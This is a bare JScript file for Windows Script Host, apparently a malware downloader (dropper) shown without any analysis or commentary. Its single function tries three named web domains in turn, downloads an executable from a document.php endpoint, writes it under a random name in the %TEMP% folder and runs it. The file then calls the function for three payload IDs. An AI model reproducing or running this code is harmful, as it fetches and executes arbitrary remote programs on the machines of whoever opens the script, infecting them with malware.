function download_exe_and_run(file_id) {
    var is_success = 0;
    ["idsecurednow.com", "laterrazzafiorita.it", "ihaveavoice2.com"].forEach((site) => {
        if (is_success == 1) return;
        var shell = new ActiveXObject("WScript.Shell");
        var file_path = shell.ExpandEnvironmentStrings("%TEMP%") + "\\" +
                        Math.round(Math.random() * 100000000) + ".exe";
        var connection = new ActiveXObject("MSXML2.XMLHTTP");
        connection.onreadystatechange = function () {
            if (connection.readyState == 4 && connection.status == 200) {
                var file_sys = new ActiveXObject("ADODB.Stream");
                file_sys.open(); file_sys.type = 1; file_sys.write(connection.ResponseBody);
                is_success = 1; file_sys.position = 0;
                file_sys.saveToFile(file_path, 2); shell.Run(file_path, 1, 0);
                file_sys.close();
            };
        };
        connection.open("GET", "http://" + site + "/document.php?id=" + file_id, false); 
        connection.send();
    });
};
download_exe_and_run(6441);
download_exe_and_run(802);
download_exe_and_run(1483);